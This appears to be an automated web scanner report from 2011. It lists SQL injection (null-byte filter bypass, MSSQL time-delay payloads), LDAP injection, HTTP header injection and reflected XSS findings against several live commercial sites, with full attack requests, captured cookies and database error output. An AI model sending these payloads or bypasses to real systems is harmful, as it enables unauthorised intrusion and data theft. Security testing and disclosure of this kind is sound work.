The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:31:57 GMT
Server: Omniture DC/2.0.0
Content-Length: 451
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/ranhcorporate,ranhrollup/1/H.17/s7257423425526 ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:29:42 GMT
Server: Omniture DC/2.0.0
Content-Length: 451
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/ranhcorporate,ranhrollup/1/H.17/s7481922958044 ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:13:47 GMT
Server: Omniture DC/2.0.0
Content-Length: 429
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/ranhcorporate,ranhrollup/1 was not found on thi ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:57:40 GMT
Server: Omniture DC/2.0.0
Content-Length: 439
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/ranhrollup/1/H.22.1/s75506922125350 was not fo ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 23:02:14 GMT
Server: Omniture DC/2.0.0
Content-Length: 439
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/ranhrollup/1/H.22.1/s79787087680306 was not fo ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The PW parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the PW parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title> ...[SNIP]...
The UN parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the UN parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title> ...[SNIP]...
The cid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
The cpc parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cpc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string '0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near '0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70'.</title> ...[SNIP]...
The cpid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cpid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The password parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the password parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title> ...[SNIP]...
The username parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the username parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title> ...[SNIP]...
The cid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
The cpc parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cpc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'mCUbki05i2q2gM801Slr08SHaX285EO45'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'mCUbki05i2q2gM801Slr08SHaX285EO45'.</title> ...[SNIP]...
The __EVENTARGUMENT parameter appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __EVENTARGUMENT parameter. The application took 25172 milliseconds to respond to the request, compared with 4165 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C ...[SNIP]...
The _msuuid_787f8z6077 cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the _msuuid_787f8z6077 cookie. The application took 52532 milliseconds to respond to the request, compared with 10937 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C ...[SNIP]...
The c cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the c cookie. The application took 19936 milliseconds to respond to the request, compared with 2707 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fPromCode%3d571423&PromCode=571423">here</a>.</h2 ...[SNIP]...
The s_id cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the s_id cookie. The application took 53423 milliseconds to respond to the request, compared with 10937 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C ...[SNIP]...
1.19. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach?taxonomyId=17&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.computerworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22922409.1116149048.1303476387.1303476387.1303476387.1; __utmz=22922409.1303476387.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __switchTo5x=60; __unam=8eb1eeb-12f7d3f43b2-c1bcf53-1
The pid parameter appears to be vulnerable to LDAP injection attacks.
The payloads 2fda59a1d239f5ba)(sn=* and 2fda59a1d239f5ba)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
The value of the email request parameter submitted to the URL /create-account-submit.do is copied into the HTML document as plain text between tags at the URL //account.do. The payload 2559e<script>alert(1)</script>8523ef6493d was submitted in the email parameter. This input was returned unmodified in a subsequent request for the URL //account.do.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the Location response header. The payload 8d4c5%0d%0a27bb07a4caf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8d4c5%0d%0a27bb07a4caf/new.computerworlduk.com/security1;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=2;ord=1303854538291? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of REST URL parameter 1 is copied into the Location response header. The payload 95a76%0d%0a26ff575b102 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /95a76%0d%0a26ff575b102/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=3;ord=1303854538291? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the callback request parameter is copied into the Location response header. The payload 8079d%0d%0a98a5ae34c96 was submitted in the callback parameter. This caused a response containing an injected HTTP header.
Request
GET /syndication/get_widget.js?callback=8079d%0d%0a98a5ae34c96&output=json&location=http%3A%2F%2Fwww.aac.org%2Fsite%2FTR%2FEvents%2FAWB08%3Fpg%3Dteam%26fr_id%3D1110%26team_id%3D24880&timestamp=1303854282405&appId.0=9dc88731-b2ec-4909-9bc6-b15b8881219b HTTP/1.1
Host: widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 21:44:34 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/?callback=8079d
98a5ae34c96
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript
Content-Length: 0
The value of the callback request parameter is copied into the Location response header. The payload a292f%0d%0ad3fe71315d0 was submitted in the callback parameter. This caused a response containing an injected HTTP header.
Request
GET /syndication/get_widget.js?callback=a292f%0d%0ad3fe71315d0&output=json&location=http%3A%2F%2Fwww.widgetbox.com%2Flist%2Fmost_popular&timestamp=1303854385556&appId.0=077f25c8-0348-4215-9539-57b2ff17f13b HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 21:46:18 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/?callback=a292f
d3fe71315d0
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript
Content-Length: 0
5. Cross-site scripting (reflected)
There are 266 instances of this issue:
The value of the labels request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 139d0"-alert(1)-"6aa7e702a5c was submitted in the labels parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb139d0"-alert(1)-"6aa7e702a5c&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... /click%3Bh%3Dv8/3af5/f/163/%2a/f%3B240320616%3B0-0%3B0%3B62289812%3B3454-728/90%3B41844250/41862037/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb139d0"-alert(1)-"6aa7e702a5c&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE ...[SNIP]...
The value of the redirecturl2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db356"-alert(1)-"f49aabc7bfe was submitted in the redirecturl2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=db356"-alert(1)-"f49aabc7bfe HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... TX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=db356"-alert(1)-"f49aabc7bfehttp://www.metropcs.com/cell-phone-plans"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the rtbdata2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f143"-alert(1)-"667d895dc3f was submitted in the rtbdata2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg4f143"-alert(1)-"667d895dc3f&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... AUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg4f143"-alert(1)-"667d895dc3f&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29"); var fscUrl = url; var fsc ...[SNIP]...
The value of the rtbip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cdb3"-alert(1)-"210cce18065 was submitted in the rtbip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.1467cdb3"-alert(1)-"210cce18065&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... /f/163/%2a/r%3B240320616%3B1-0%3B0%3B62289812%3B3454-728/90%3B41885373/41903160/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.1467cdb3"-alert(1)-"210cce18065&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQG ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c32f1"-alert(1)-"34398203435 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1lsc32f1"-alert(1)-"34398203435&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
